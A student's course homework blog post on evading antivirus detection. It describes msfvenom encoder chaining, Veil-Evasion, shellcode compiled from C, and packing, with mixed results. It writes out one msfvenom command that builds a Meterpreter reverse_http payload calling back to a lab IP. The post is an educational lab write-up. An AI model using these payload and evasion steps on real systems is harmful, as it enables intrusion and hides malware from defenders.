1. 程式人生 > >2017-2018-2 20179207 《網絡攻防技術》第十二周作業 免殺技術

2017-2018-2 20179207 《網絡攻防技術》第十二周作業 免殺技術

使用 一段 環境 修改 什麽 重新 分享圖片 系統 alpha

基礎問題回答

(1)殺軟是如何檢測出惡意代碼的?

基於特征碼的檢測

惡意代碼常常具有明顯的特征碼也就是一段數據,殺軟檢測到具有該特征碼的程序就當作檢測到了惡意代碼。

啟發式惡意軟件檢測

基於行為的惡意軟件檢測

如果一個程序的行為是帶有惡意的行為,那麽這個程序也會被認為是惡意代碼。

(2)免殺是做什麽?

使用一些方法使得惡意程序不被殺軟和防火墻發現,避免被查殺。

(3)免殺的基本方法有哪些?

改變特征碼

對惡意代碼進行加殼、用其他語言或編譯器進行再編譯,利用shellcode進行編碼

改變攻擊行為

基於內存操作、減少對系統的修改、加入混淆作用的正常功能代碼

實踐

msf編碼器

MSF編碼器。其功能是對我們攻擊載荷文件進行重新的排列編碼,改變可執行文件中的代碼形狀,避免被殺軟認出。

msf生成後門(裸奔),運行時,被聯想電腦管家檢測到危險。(test.exe)

想到使用使用msf多重編碼。

這裏使用管道讓msfvenom對攻擊載荷(test1.exe)多重編碼,先用shikata_ga_nai編碼20次,接著來10次的alpha_upper編碼,再來10次的countdown編碼。獲得test2.exe

在線檢測 ,嗯,失敗。

技術分享圖片

veil

通過git克隆的方式對veil-evasion進行安裝,長時間的等待和安裝,裝好後利用它生成payload。報錯無法定位到runx.exe,似乎是入口文件,可能安裝過程中出現問題。於是重新安裝(同樣使用git方式)。安裝三次依然無法生成。處於絕望狀態,突然想到去veil官網看看,驚喜發現,kali下安裝的版本是2.8似乎是不再維護了,所以現在是3.x版本的了,嘗試安裝新版本。

2.8不友好,generate不來哦。。
技術分享圖片

3.1成功!用veil生成payload。
技術分享圖片

test1

生成test1.exe後放到主機上,沒有檢測出來。

運行一下試試。

果然,被查殺了。
技術分享圖片

shellcode

使用msfvenom生成shellcode :

msfvenom -pwindows/meterpreter/reverse_http lhost=192.168.1.105 lport=5555 -f c

利用c語言編寫的shellcode ,編譯後獲得exe ,...(* ̄0 ̄)ノ沒有被發現~金山同誌可以反思一下了。。。。

技術分享圖片

放到在線檢測網站上。。

技術分享圖片

加殼

1.upx加殼

技術太簡單,秒被發現。

2.第三方軟件加殼

加個殼試試

技術分享圖片

哈哈,又失敗了。。。

技術分享圖片

實踐總結與體會

環境搭建的過程很崩潰。

離實戰還差很多。沒有足夠的偽裝,而且生成的很多木馬依舊會被一些其他的殺毒軟件檢測出來。CobaltStrike可以試一下。

2017-2018-2 20179207 《網絡攻防技術》第十二周作業 免殺技術